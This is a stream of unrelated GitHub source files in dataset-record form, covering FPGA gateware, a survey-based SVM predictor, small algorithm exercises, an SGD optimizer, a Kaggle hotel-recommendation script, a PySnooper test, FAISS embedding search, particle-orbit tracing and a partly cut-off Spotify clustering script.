as_.o.eq(self.wb_to_68k.as_)\n m.d.comb += as_.oe.eq(bus_assert)\n m.d.comb += uds_.o.eq(self.wb_to_68k.uds_)\n m.d.comb += uds_.oe.eq(bus_assert)\n m.d.comb += lds_.o.eq(self.wb_to_68k.lds_)\n m.d.comb += lds_.oe.eq(bus_assert)\n m.d.comb += rw_.o.eq(self.wb_to_68k.rw_)\n m.d.comb += rw_.oe.eq(bus_assert)\n\n # temporary hack for led counter\n #m.d.comb += self.wb_to_68k.i_data.eq(0)\n\n\n # /----------------------------------------------------------\\\n # | RETURN |\n # \\----------------------------------------------------------/\n return m\n\nif __name__ == \"__main__\":\n platform = ULX3S_85F_Platform()\n sys = System()\n platform.build(sys, do_program=True)\n","repo_name":"tdaede/anubis-gateware","sub_path":"anubis.py","file_name":"anubis.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"990219921","text":"import pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom 
sklearn.svm import LinearSVC\n\nquestions = [\n \"Are you self-employed?\",\n \"How many employees does your company or organization have?\",\n \"Does your employer provide mental health benefits as part of healthcare coverage?\",\n \"Do you know the options for mental health care available under your employer-provided coverage?\",\n \"Has your employer ever formally discussed mental health (for example, as part of a wellness campaign or other official communication)?\",\n \"Does your employer offer resources to learn more about mental health concerns and options for seeking help?\",\n \"Is your anonymity protected if you choose to take advantage of mental health or substance abuse treatment resources provided by your employer?\",\n \"Do you think that discussing a mental health disorder with your employer would have negative consequences?\",\n \"Do you think that discussing a physical health issue with your employer would have negative consequences?\",\n \"Would you feel comfortable discussing a mental health disorder with your coworkers?\",\n \"Would you feel comfortable discussing a mental health disorder with your direct supervisor(s)?\",\n \"Do you feel that your employer takes mental health as seriously as physical health?\",\n \"Have you heard of or observed negative consequences for co-workers who have been open about mental health issues in your workplace?\",\n \"Do you know local or online resources to seek help for a mental health disorder?\",\n \"Do you believe your productivity is ever affected by a mental health issue?\",\n \"Do you have previous employers?\",\n \"Have your previous employers provided mental health benefits?\",\n \"Were you aware of the options for mental health care provided by your previous employers?\",\n \"Did your previous employers ever formally discuss mental health (as part of a wellness campaign or other official communication)?\",\n \"Did your previous employers provide resources to learn more about mental health issues and how to seek help?\",\n \"Do you think that discussing a mental health disorder with previous employers would have negative consequences?\",\n \"Do you think that discussing a physical health issue with previous employers would have negative consequences?\",\n \"Would you have been willing to discuss a mental health issue with your previous co-workers?\",\n \"Would you have been willing to discuss a mental health issue with your direct supervisor(s)?\",\n \"Did you feel that your previous employers took mental health as seriously as physical health?\",\n \"Did you hear of or observe negative consequences for co-workers with mental health issues in your previous workplaces?\",\n \"Would you be willing to bring up a physical health issue with a potential employer in an interview?\",\n \"Would you bring up a mental health issue with a potential employer in an interview?\",\n \"Do you feel that being identified as a person with a mental health issue would hurt your career?\",\n \"Do you think that team members/co-workers would view you more negatively if they knew you suffered from a mental health issue?\",\n \"Have you observed or experienced an unsupportive or badly handled response to a mental health issue in your current or previous workplace?\",\n \"Have your observations of how another individual who discussed a mental health disorder made you less likely to reveal a mental health issue yourself in your current workplace?\",\n \"Do you have a family history of mental illness?\",\n \"Have you had a mental health disorder in the 
past?\",\n \"Have you been diagnosed with a mental health condition by a medical professional?\",\n \"Do you work remotely?\"\n]\n\n\ndef diff_answers_column(column_of_values):\n unique = []\n for value in column_of_values:\n if value not in unique:\n unique.append(value)\n return unique\n\n\ndef columns_to_list(pandas_columns):\n list_with_column_names = []\n for c in pandas_columns.columns:\n list_with_column_names.append(c)\n return list_with_column_names\n\n\ndef list_to_dict(list_of_options):\n order = 1\n dictionary = {}\n for option in list_of_options:\n if option != \"Nan\":\n dictionary[order] = option\n order += 1\n return dictionary\n\n\ndef encoded(vect):\n enc = LabelEncoder()\n label_encoder = enc.fit(vect)\n t = label_encoder.transform(vect)\n return t\n\n\ndef int_encode_features(data_value, idx):\n return encoded(data_value[:, idx])\n\n\ndf = pd.read_csv(\"mental-heath-in-tech-2016.csv\")\ndf.keys()\nk = []\nfor i in range(1, len(df.keys()) + 1):\n k.append(\"Q\" + str(i))\ndf.columns = k\n\nfor col in df:\n my_new_list = [s for s in df[col] if type(s) != str]\n if len(my_new_list) < len(df[col]):\n df[col] = df[col].replace([None], [\"Nan\"])\n\nnewDF = df.drop(\n [\"Q3\", \"Q4\", \"Q10\", \"Q17\", \"Q19\", \"Q20\", \"Q21\", \"Q22\", \"Q24\", \"Q30\", \"Q38\", \"Q40\", \"Q43\", \"Q49\", \"Q50\", \"Q52\",\n \"Q53\", \"Q54\", \"Q55\", \"Q56\", \"Q57\", \"Q58\", \"Q59\", \"Q60\", \"Q61\", \"Q62\"], axis=1)\n\ntarget = newDF[[\"Q48\"]].copy()\nwithoutTarget = newDF.drop([\"Q48\"], axis=1)\n\nlistOfDictsWithDifferentAnswers = []\nindex = 0\nfor column in withoutTarget:\n listOfDictsWithDifferentAnswers.append(list_to_dict(diff_answers_column(df[column])))\n index += 1\n\n# change possible answers of 1. and 16. question, to make it more readable\nlistOfDictsWithDifferentAnswers[0][1] = \"No\"\nlistOfDictsWithDifferentAnswers[0][2] = \"Yes\"\nlistOfDictsWithDifferentAnswers[15][1] = \"No\"\nlistOfDictsWithDifferentAnswers[15][2] = \"Yes\"\n\nlist_of_columns = columns_to_list(withoutTarget)\n\nnumericalAnswers = []\nfor x in range(len(questions)):\n print(questions[x])\n print(listOfDictsWithDifferentAnswers[x])\n answer = input()\n while not answer.isdigit() or int(answer) < 1 or int(answer) > len(listOfDictsWithDifferentAnswers[x]):\n answer = input()\n numericalAnswers.append(answer)\n\nuserAnswers = []\nfor a in range(len(numericalAnswers)):\n if a == 0:\n if numericalAnswers[a] == \"1\":\n userAnswers.append(0)\n else:\n userAnswers.append(1)\n elif a == 15:\n if numericalAnswers[a] == \"2\":\n userAnswers.append(0)\n else:\n userAnswers.append(1)\n else:\n userAnswers.append(listOfDictsWithDifferentAnswers[a][int(numericalAnswers[a])])\n\nuserRow = pd.DataFrame([userAnswers], columns=list_of_columns)\ncompleteWithout = withoutTarget.append(userRow, ignore_index=True)\n\nuserIllness = pd.DataFrame([\"No\"], columns=[\"Q48\"])\ncompleteTarget = target.append(userIllness, ignore_index=True)\n\ndata = completeWithout.values\n\nfor i in range(completeWithout.shape[1]):\n data[:, i] = int_encode_features(data, i)\ndata = data.astype(float)\ntarget = completeTarget.values.ravel()\n\ndata_without_last = data[:-1, :]\ntarget_without_last = target[:-1]\nuserInfo = data[-1, :].reshape(1, -1)\n\nclf = LinearSVC(random_state=0, max_iter=10000)\nclf.fit(data_without_last, target_without_last) \nprediction = clf.predict(userInfo)\n \nif prediction[0] == 'Yes':\n print(\"Accordingly to our machine learning model you suffer from some kind of mental health disease. 
You should confirm this result with a doctor. Good luck :)\")\nelif prediction[0] == 'No':\n print(\"Accordingly to our machine learning model you don't suffer from any kind of mental health disease. However you should check it with a doctor.\")\nelse:\n print(\"Our machine learning model couldn't determine your mental health state. You should consider consulting with a doctor.\")\n","repo_name":"MatejMarko/medical_dataset_project","sub_path":"user_prediction.py","file_name":"user_prediction.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"8978043237","text":"#QUESTION :Given an integer array nums sorted in non-decreasing order, return an array of the squares of each number sorted in non-decreasing order.\n\n#Following is the function which returns an array after squaring and sorting\ndef sortedSquares(nums):\n arr=[]\n for i in range (0,len(nums)):\n arr.append(nums[i]**2)\n arr.sort()\n return arr\n\n#at leet code platform there was the array provided but here we need to take the array as input from user\nnum=int(input(\"Enter length of the array : \"))\narr=[]\nfor i in range (0,num):\n arr.append(int(input(\"Enter the \"+str(i)+\"th item of array : \")))\n\n#following code prints the desired oputput\nprint(\"The squared sorted array is : \")\nfor i in sortedSquares(arr):\n print(i,end=\" \")","repo_name":"dscpvgcoet/Hacktoberfest2021-DSA-SHEET","sub_path":"PYTHON/ARRAY/Sort_squares-of-a-sorted-array.py","file_name":"Sort_squares-of-a-sorted-array.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4861947684","text":"import numpy as np\n\nclass Optimizer_SGD:\n #initialize otpimizer with learning rate, decay, and momentum, set all to 0\n def __init__(self, learning_rate=1., decay=0., momentum=0.):\n self.learning_rate = learning_rate\n self.current_learning_rate = learning_rate\n self.decay = decay\n self.iterations = 0\n self.momentum = momentum\n\n #call once before parameter updates\n def pre_update_params(self):\n #if we use learning rate decay\n if self.decay:\n self.current_learning_rate = self.learning_rate * (1 / (1 + self.decay * self.iterations))\n\n #update parameters\n def update_params(self, layer):\n #if we use momentum\n if self.momentum:\n #If layer does not have momentum arrays, create them filled with zeros\n if not hasattr(layer, 'weight_momentums'):\n layer.weight_momentums = np.zeros_like(layer.weights)\n #create momentum for biases\n layer.bias_momentums = np.zeros_like(layer.biases)\n\n #create weight updates with added momentum - using previous update\n # updates multiplied by retainment factor and updated with current gradient\n weight_updates = self.momentum * layer.weight_momentums - (self.current_learning_rate * self.dweights)\n layer.weight_momentums = weight_updates\n\n #create bias updates\n bias_updates = self.momentum * layer.bias_momentums - (self.current_learning_rate * self.dbiases)\n layer.bias_momentums = bias_updates\n\n #vanilla SGD (without momentum update)\n else:\n weight_updates = -self.current_learning_rate * layer.dweights\n bias_updates = -self.current_learning_rate * layer.dbiases\n \n # Update weights and biases using either\n # vanilla or momentum updates\n layer.weights += weight_updates\n layer.biases += bias_updates\n\n #call after parameter updates\n def post_update_params(self):\n self.iterations += 
1\n","repo_name":"DhruvK0/Neural-Networks-From-Scratch","sub_path":"ANN/optimizer_SGD.py","file_name":"optimizer_SGD.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2413004025","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nfrom subprocess import check_output\nprint(check_output([\"ls\", \"../input\"]).decode(\"utf8\"))\n\n# Any results you write to the current directory are saved as output.\n\"\"\"\nauthor: klchang\ncreated time: 2016.6.4\nupdates:\n1. using heap.nlargest instead of sorted and min functions in top_five()\n2. add datetime weight\n\n\"\"\"\nimport time\nimport heapq\n\n\ndef sum_and_count(lst):\n # weight,result = 0.8456, 0.47147; 0.7456, 0.47152; 0.9456, 0.47062; \n weight = 0.7456\n return sum(lst) * weight + len(lst) * (1 - weight)\n\n\ndef top_five(hc):\n sorted_hc = heapq.nlargest(5, hc, key=lambda x:x[0])\n return sorted_hc\n\n\n# function: Pre-process the train data\ndef preprocess(k=5):\n print(\"Pre-processing train dataset...\")\n # data = {}\n search_dest_dict = {}\n popular_hotel_clusters = {}\n total = 0\n with open(\"../input/train.csv\") as fp:\n titles = fp.readline().strip().split(',')\n titles_index = {}\n for i, title in enumerate(titles):\n titles_index[title] = i\n # print(titles)\n # \"is_booking\",\"orig_destination_distance\",\"hotel_cluster\",\"srch_destination_id\"\n ind_dist = titles_index['orig_destination_distance']\n ind_clus = titles_index['hotel_cluster']\n ind_srch_dest_id = titles_index['srch_destination_id']\n ind_user_loc_city = titles_index['user_location_city']\n ind_booking = titles_index['is_booking']\n ind_datetime = titles_index['date_time']\n \n # list(orig_destination_distance, hotel_cluster)\n dest_id_hotel_cluster_count = {}\n # list(srch_destination_id, hotel_cluster)\n dest_id_hotel_cluster_count2 = {}\n for line in fp:\n fields = line.strip().split(',')\n if not fields:\n break\n total += 1\n if total % 1000000 == 0:\n print(\"The count that has been processed in train dataset is %s.\" % total)\n\n cluster = int(fields[ind_clus])\n if cluster not in popular_hotel_clusters:\n popular_hotel_clusters[cluster] = 1\n else:\n popular_hotel_clusters[cluster] += 1\n # Add the fields \"srch_destination_id\" and \"user_location_city\"\n search_dest = fields[ind_srch_dest_id]\n user_city = fields[ind_user_loc_city]\n is_booking = int(fields[ind_booking])\n distance = fields[ind_dist]\n # Add datetime weight\n date_time = fields[ind_datetime]\n if date_time[:4] == '2014':\n is_booking *= 3\n # expedia_train[,sum_and_count(is_booking),by=list(orig_destination_distance, hotel_cluster)]\n count = dest_id_hotel_cluster_count.get((distance, cluster))\n if not count:\n dest_id_hotel_cluster_count[(distance, cluster)] = [is_booking]\n else:\n dest_id_hotel_cluster_count[(distance, cluster)].append(is_booking)\n # expedia_train[,sum_and_count(is_booking),by=list(srch_destination_id, hotel_cluster)]\n count = dest_id_hotel_cluster_count2.get((search_dest, 
cluster))\n if not count:\n dest_id_hotel_cluster_count2[(search_dest, cluster)] = [is_booking]\n else:\n dest_id_hotel_cluster_count2[(search_dest, cluster)].append(is_booking)\n\n # dest_id_hotel_cluster_count[,top_five(hotel_cluster,V1),by=orig_destination_distance]\n # group by orig_destination_distance, then sort by V1 - sum_and_count(is_booking)\n for key, value in dest_id_hotel_cluster_count.items():\n dest_id_hotel_cluster_count[key] = sum_and_count(value)\n dest_top_five = {}\n # key = (orig_destination_distance, hotel_cluster)\n for key, value in dest_id_hotel_cluster_count.items():\n if not dest_top_five.get(key[0]):\n dest_top_five[key[0]] = [(value, key[1])]\n else:\n dest_top_five[key[0]].append((value, key[1]))\n for key, value in dest_top_five.items():\n dest_top_five[key] = top_five(value)\n\n # dest_id_hotel_cluster_count1[,top_five(hotel_cluster,V1),by=srch_destination_id]\n # group by srch_destination_id, then sort by V1 - sum_and_count(is_booking)\n for key, value in dest_id_hotel_cluster_count2.items():\n dest_id_hotel_cluster_count2[key] = sum_and_count(value)\n dest_top_five2 = {}\n # key = (srch_destination_id, hotel_cluster)\n for key, value in dest_id_hotel_cluster_count2.items():\n if not dest_top_five2.get(key[0]):\n dest_top_five2[key[0]] = [(value, key[1])]\n else:\n dest_top_five2[key[0]].append((value, key[1]))\n for key, value in dest_top_five2.items():\n dest_top_five2[key] = top_five(value)\n # Get top k hotel clusters\n top_hotel_clusters = heapq.nlargest(k, popular_hotel_clusters.items(), key=lambda x: x[1])\n\n data = [dest_top_five, dest_top_five2]\n\n return [data, top_hotel_clusters]\n\n\n# function: Compute the k Nearest Neighbor\n# user_lst = [[dest_top_five, dest_top_five2], top_hotel_clusters]\n# dest_top_five = {orig_destination_distance: [(sum_and_len(is_booking) group by (srch_destination_id, hotel_cluster),\n# hotel_cluster)]}\n# dest_top_five2 = {srch_destination_id: [(sum_and_len(is_booking) group by (srch_destination_id, hotel_cluster),\n# hotel_cluster)]}\ndef computeNearestNeighbor(user, users_lst, k=5):\n # Get the test dataset fields\n user_city, dist, srch_dest = user[1]\n length = 0\n result = []\n if dist and dist in users_lst[0][0].keys():\n result = list(map(lambda x: x[1], users_lst[0][0][dist]))\n length += len(result)\n if length < k and srch_dest in users_lst[0][1].keys():\n tmp = list(map(lambda x: x[1], users_lst[0][1][srch_dest]))\n for clu in result:\n if clu in tmp:\n tmp.remove(clu)\n result += tmp\n length += len(result)\n if length < k:\n # setting to be top clusters\n addition = list(map(lambda x: x[0], users_lst[1]))\n # Remove repetitive clusters\n for clu in result:\n if clu in addition:\n addition.remove(clu)\n result += addition\n \n return result[:k]\n\n\n# function: Test using test dataset\ndef test(train_data):\n # Output result file\n filename = 'submission_%s.csv' % time.strftime(\"%Y%m%d%H\", time.localtime())\n\n with open('../input/test.csv') as fp:\n titles = fp.readline().strip().split(',')\n titles_index = {}\n for i, title in enumerate(titles):\n titles_index[title] = i\n ind_dist = titles_index['orig_destination_distance']\n ind_id = titles_index['id']\n ind_srch_dest = titles_index['srch_destination_id']\n ind_user_loc_city = titles_index['user_location_city']\n \n with open(filename, 'w') as output:\n output.write('id,hotel_cluster\\n')\n for line in fp:\n fields = line.strip().split(',')\n if not fields:\n break\n user_id = fields[ind_id]\n user_city = fields[ind_user_loc_city]\n srch_dest = 
fields[ind_srch_dest]\n dist = fields[ind_dist]\n user = (user_id, (user_city, dist, srch_dest))\n result = computeNearestNeighbor(user, train_data, 5)\n result = [str(i) for i in result]\n out_str = user_id + ',' + ' '.join(result) + '\\n'\n output.write(out_str)\n\n\n# function: main function \ndef main():\n print(\"Starting ... \")\n sta_time = time.time()\n # Pre-processing Train Data\n data = preprocess()\n preprocess_time = time.time()\n print(\"The pre-processing time is %s seconds.\" % (preprocess_time-sta_time))\n # Test Data\n test(data)\n print(\"The test time is %s seconds.\" % (time.time()-preprocess_time))\n print(\"Ending ... \")\n \nif __name__ == '__main__':\n main()\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/expedia-hotel-recommendations/klchang/multiplevarcluster.py","file_name":"multiplevarcluster.py","file_ext":"py","file_size_in_byte":8545,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"11195695313","text":"import io\nimport textwrap\nimport threading\nimport types\nimport sys\n\nfrom pysnooper.utils import truncate\nimport pytest\n\nimport pysnooper\nfrom pysnooper import pycompat\nfrom pysnooper.variables import needs_parentheses\nfrom .utils import (assert_output, assert_sample_output, VariableEntry,\n CallEntry, LineEntry, ReturnEntry, OpcodeEntry,\n ReturnValueEntry, ExceptionEntry, ExceptionValueEntry,\n SourcePathEntry, CallEndedByExceptionEntry,\n ElapsedTimeEntry)\nfrom . import mini_toolbox\n\n\n\ndef test_chinese():\n with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:\n path = folder / 'foo.log'\n @pysnooper.snoop(path, color=False)\n def foo():\n a = 1\n x = '失败'\n return 7\n\n foo()\n with path.open(encoding='utf-8') as file:\n output = file.read()\n assert_output(\n output,\n (\n SourcePathEntry(),\n CallEntry(),\n LineEntry(),\n VariableEntry('a'),\n LineEntry(u\"x = '失败'\"),\n VariableEntry(u'x', (u\"'失败'\" if pycompat.PY3 else None)),\n LineEntry(),\n ReturnEntry(),\n ReturnValueEntry('7'),\n ElapsedTimeEntry(),\n ),\n )\n","repo_name":"cool-RR/PySnooper","sub_path":"tests/test_chinese.py","file_name":"test_chinese.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":16103,"dataset":"github-code","pt":"54"} +{"seq_id":"7311534378","text":"from time import time\n\ndef main():\n\n start = time()\n\n high = fac(10)\n summ = 0\n\n for i in range(3, high):\n if digitsFact(i) == i:\n summ += i\n\n print(summ)\n print(time() - start)\n\ndef digitsFact(n):\n\n stri = str(n)\n total = 0\n\n for i in range(0, len(stri)):\n total += fac(int(stri[i]))\n\n return total\n\ndef fac(x):\n fact = 1\n for i in range(1, x + 1):\n fact *= i\n return fact\n\nif __name__ == '__main__':\n main()\n","repo_name":"this-jacob/project-euler","sub_path":"complete/31 - 40/Problem34/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"408757654","text":"#!/usr/bin/env python2\n# encoding=utf-8\n# must set paths:\n# export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/hieuhoang/intel/compilers_and_libraries_2017.4.196/linux/mkl/lib/intel64_lin\n# export PYTHONPATH=$PYTHONPATH:/home/hieuhoang/workspace/github/faiss\n \nfrom __future__ import print_function\n\nimport argparse\nimport faiss\nimport gzip\nimport itertools\nimport sys\nimport torch\nimport torch.utils.serialization\n\n\ndef 
_parse_options():\n p = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n p.add_argument(\n '--embeddings',\n default='/data/holger/europarl.un16lc/embed.th7/eparl7lu.efs.w50.en.00.efsraz-1allmd.BLSTM.1x512.max.@13.embed',\n help='embeddings file, e.g. \"eparl7lu.efs.w50.en.00.efsraz-1allmd.BLSTM.1x512.max.@13.embed\"')\n p.add_argument(\n '--sentences',\n default='/data/holger/europarl.un16lc/data.norm.un6lc/eparl7lu.efs.w50.en.gz',\n help=('sentences (order of the lines and embeddings is expected to be identical), e.g.' +\n ' \"eparl7lu.efs.w50.en.gz\"'))\n p.add_argument(\n '--offset',\n default=0,\n help='embeddings file offset (0 for the example emddings file)')\n p.add_argument(\n '--sent-index',\n default=100500,\n help='sentence index to search for', )\n p.add_argument(\n '-k',\n default=10,\n help='number of nearest neighbors to search for', )\n return p.parse_args()\n\n\ndef _open(path, mode):\n if path.endswith('.gz'):\n return gzip.open(path, mode)\n return open(path, mode)\n\n\ndef _main(a):\n print('Loading embeddings...')\n sys.stdout.flush()\n t = torch.utils.serialization.load_lua(a.embeddings)\n\n print('Loading sentences...')\n sys.stdout.flush()\n sent = _open(a.sentences, 'rb').readlines()\n\n res = faiss.StandardGpuResources()\n index = faiss.GpuIndexFlatIP(res, t.size()[1])\n print('Building index on GPU...')\n sys.stdout.flush()\n index.add(x=t.numpy())\n\n print('Searching index...')\n sys.stdout.flush()\n distances, indices = index.search(x=t[a.sent_index:a.sent_index + 1].numpy(), k=a.k)\n\n print('Searched for: \"{}\"'.format(sent[a.sent_index].encode('string-escape')))\n print('Nearest neighbors (distance \\\\t index \\\\t sentence):')\n for d, i in itertools.izip(distances[0], indices[0]):\n j = i + a.offset\n c_sentence = sent[j].encode('string-escape')\n print('{dist:.2f}\\t{index}\\t\"{sentence}\"'.format(dist=d, index=j, sentence=c_sentence))\n sys.stdout.flush()\n\n print('Done')\n sys.stdout.flush()\n\n\nif '__main__' == __name__:\n a = _parse_options()\n sys.exit(_main(a) or 0)\n","repo_name":"paracrawl/embedding","sub_path":"embed_index/load_build_search_example.py","file_name":"load_build_search_example.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"32398525485","text":"#!/usr/bin/env python\n\nfrom neat.fields import Simple # isort:skip\nfrom neat.tracing import ChargedParticle, ParticleOrbit # isort:skip\nimport os\nimport time\n\nimport numpy as np\n\n\"\"\" \nTrace the orbit of a single particle in a\nquasisymmetric stellarator \n\"\"\"\n\n# Initialize an alpha particle at a radius = r_initial\nr_initial = 0.2 # initial normalized toroidal magnetic flux (radial VMEC coordinate)\ntheta_initial = np.pi / 2 # initial poloidal angle\nphi_initial = 1.2 # initial poloidal angle\nenergy = 3.52e6 # electron-volt\ncharge = 2 # times charge of proton\nmass = 4 # times mass of proton\nLambda = 0.96 # = mu * B0 / energy\nvpp_sign = -1 # initial sign of the parallel velocity, +1 or -1\nnsamples = 100 # IGNORED - resolution in time\ntfinal = 2e-4 # seconds\nwout_filename = os.path.join(os.path.dirname(__file__), \"inputs\", \"wout_ARIESCS.nc\")\nB_scale = 1 # Scale the magnetic field by a factor\nAminor_scale = 1 # Scale the machine size by a factor\n\ng_field = Simple(\n wout_filename=wout_filename, B_scale=B_scale, Aminor_scale=Aminor_scale\n)\ng_particle = ChargedParticle(\n r_initial=r_initial,\n 
theta_initial=theta_initial,\n phi_initial=phi_initial,\n energy=energy,\n Lambda=Lambda,\n charge=charge,\n mass=mass,\n vpp_sign=vpp_sign,\n)\nprint(\"Starting particle tracer\")\nstart_time = time.time()\ng_orbit = ParticleOrbit(g_particle, g_field, nsamples=nsamples, tfinal=tfinal)\ntotal_time = time.time() - start_time\nprint(f\"Finished in {total_time}s\")\n\nprint(\"Creating B contour plot\")\ng_orbit.plot_orbit_contourB(show=False)\n\nprint(\"Creating parameter plot\")\ng_orbit.plot(show=False)\n\nprint(\"Creating 2D plot\")\ng_orbit.plot_orbit(show=False)\n\nprint(\"Creating 3D plot\")\ng_orbit.plot_orbit_3d(show=True)\n\nprint(\"Creating animation plot\")\ng_orbit.plot_animation(show=True)\n","repo_name":"rogeriojorge/NEAT","sub_path":"examples/plot_single_orbit_simple.py","file_name":"plot_single_orbit_simple.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"38793645472","text":"\nimport json as js\nimport yaml as ym\n\ndef convertJson2Yaml(ifname):\n\tfp = open(ifname, 'r')\n\tres = fp.read()\n\tfp.close()\n\n\tres = js.loads(res)\n\tres = ym.dump(res)\n\t\n\treturn(res)\n\nif __name__ == \"__main__\":\n\timport argparse\n\t## source: https://docs.python.org/2/howto/argparse.html\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument(\"-c\", '--convert', help=\"convert\", action=\"store_true\")\n\tparser.add_argument(\"-f\", '--ifname', help=\"input file\")\n\tparser.add_argument(\"-o\", '--ofname', help=\"output file\")\n\n\targs = parser.parse_args()\n\t\n\tif args.convert:\n\n\t\tifname = str(args.ifname)\n\t\tres = convertJson2Yaml(ifname)\n\t\t\n\t\tfp = open(args.ofname, 'w')\n\t\tfp.write(res)\n\t\tfp.close()\n\t\t\n\t\t\n\n","repo_name":"qorelogic/code-challenge_getpayever.com","sub_path":"src/json2yaml.py","file_name":"json2yaml.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1172992031","text":"import os\nimport pickle\nimport time\nimport numpy as np\nimport pandas as pd\n\nfrom dfops import *\nfrom conf import *\n\nfrom spark_sklearn import Converter\nfrom pyspark.ml.feature import VectorAssembler\nfrom sklearn.cluster import MeanShift\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.metrics import pairwise_distances_argmin_min\nfrom sklearn.externals import joblib\n\n# Returns user pre-pickled library as pandas dataframe, and number of samples in df\ndef load_library(lib_dir):\n with open(lib_dir, 'rb') as f:\n library = pickle.load(f)\n print('loaded')\n num_samples = len(library)\n\n return library, num_samples\n\ndef findmodels():\n temp_bool = True\n for label in matrix_labels:\n if not (os.path.isfile('models/meanshift_' + label + '.model') and os.path.isfile('models/knn_' + label + '.model')):\n temp_bool = False\n\n return temp_bool\n\n# Returns ml_analysis containing numpy matrices depicting analysis data in library['analysis'] column\n# Also returns 3 other spark vector representations of the selected feature dimensions to graph\ndef spark_dfToVectors(main_spark, lib):\n\n lib_analysis = lib['analysis']\n\n # create analysis dataframe\n print(\"Extracting analysis data\")\n start = time.time()\n ml_analysis = refactorAnalysisNP(lib_analysis)\n end = time.time()\n print('Extracted in', (end - start), 'seconds')\n\n # create features dataframe\n s_features = main_spark\n print(\"Extracting feature data\")\n assembler = 
VectorAssembler(inputCols=s_features.schema.names, outputCol=\"features\")\n v_features = assembler.transform(s_features)\n\n # create technical dataframe\n s_tech = main_spark.select('tempo', 'key', 'loudness', 'valence', 'time_signature', 'liveness', 'energy', 'danceability')\n print(\"Extracting tech data\")\n assembler = VectorAssembler(inputCols=s_tech.schema.names, outputCol=\"tech_features\")\n v_tech = assembler.transform(s_tech)\n\n # create info dataframes\n s_info = main_spark.select('speechiness', 'acousticness', 'instrumentalness')\n print(\"Extracting song info data\")\n assembler = VectorAssembler(inputCols=s_info.schema.names, outputCol=\"info_features\")\n v_info = assembler.transform(s_info)\n\n # create song id dataframes\n s_ids = main_spark.select('name', 'artist', 'album')\n print('Extracting song id info')\n assembler = VectorAssembler(inputCols=s_ids.schema.names, outputCol=\"id_features\")\n v_ids = assembler.transform(s_info)\n\n return ml_analysis, v_features, v_tech, v_info, v_ids\n\ndef separate_dfs(library, ids):\n\n lib_analysis = library['analysis']\n ids = pd.DataFrame(ids, columns=['id'])\n\n lib = library.drop(columns=['track_href', 'uri', 'analysis', 'analysis_url', 'id', 'type'])\n\n #analysis\n analysis_df = refactorAnalysisDF(lib_analysis)\n analysis_df = pd.concat([analysis_df, ids], sort=False)\n\n #main features\n main_df = pd.concat([lib, ids], sort=False)\n\n #technical features\n tech_df = library[['tempo', 'key', 'loudness', 'valence', 'time_signature', 'liveness', 'energy', 'danceability']]\n tech_df = pd.concat([tech_df, ids], sort=False)\n\n #song info\n song_df = lib[['speechiness', 'acousticness', 'instrumentalness']]\n song_df = pd.concat([song_df, ids], sort=False)\n\n #song ids\n songIds_df = lib[['name', 'artist', 'album']]\n songIds_df = pd.concat([songIds_df, ids], sort=False)\n\n return analysis_df, main_df, tech_df, song_df, songIds_df\n\n# Converts all input vectorAssembler-transformed Spark DFs to sklearn processable numpy matrices\ndef vectors_to_matrices(sc, v_features, v_tech, v_info, v_ids):\n print('Converting all vector dataframes to dense matrices')\n start = time.time()\n converter = Converter(sc)\n features, tech, info, ids = converter.toPandas(v_features), converter.toPandas(v_tech), converter.toPandas(v_info), converter.toPandas(v_ids)\n m_features, m_tech, m_info, m_ids = features.values, tech.values, info.values, ids.values\n ml_features, ml_tech, ml_info, ml_ids = normalize_matrix(m_features), normalize_matrix(m_tech), normalize_matrix(m_info), normalize_matrix(m_ids)\n end = time.time()\n print('Converted in', (end - start), 'seconds')\n return ml_features, ml_tech, ml_info, ml_ids\n\ndef load_transform_graphData(song_matrices, matrix_labels):\n\n root_vector_indices = []\n root_neighbors = []\n root_neighbor_weights = []\n\n for f_matrix, m_label in zip(song_matrices, matrix_labels):\n print('loading', m_label, 'model')\n outputfile = 'models/meanshift_' + m_label + '.model'\n clustering = joblib.load(outputfile)\n cluster_centers = clustering.cluster_centers_\n n_clusters = len(cluster_centers)\n\n # Store root vectors\n root_indices = []\n # Returns list of 'labels' corresponding to the song index in the lib array\n for center in cluster_centers:\n roots, _ = pairwise_distances_argmin_min([center], f_matrix)\n root_indices.append(roots)\n\n root_vector_indices.append(root_indices)\n # Given list of roots, perform knn on each one to get neighboring nodes\n for root in root_indices:\n outputfile = 'models/knn_' + 
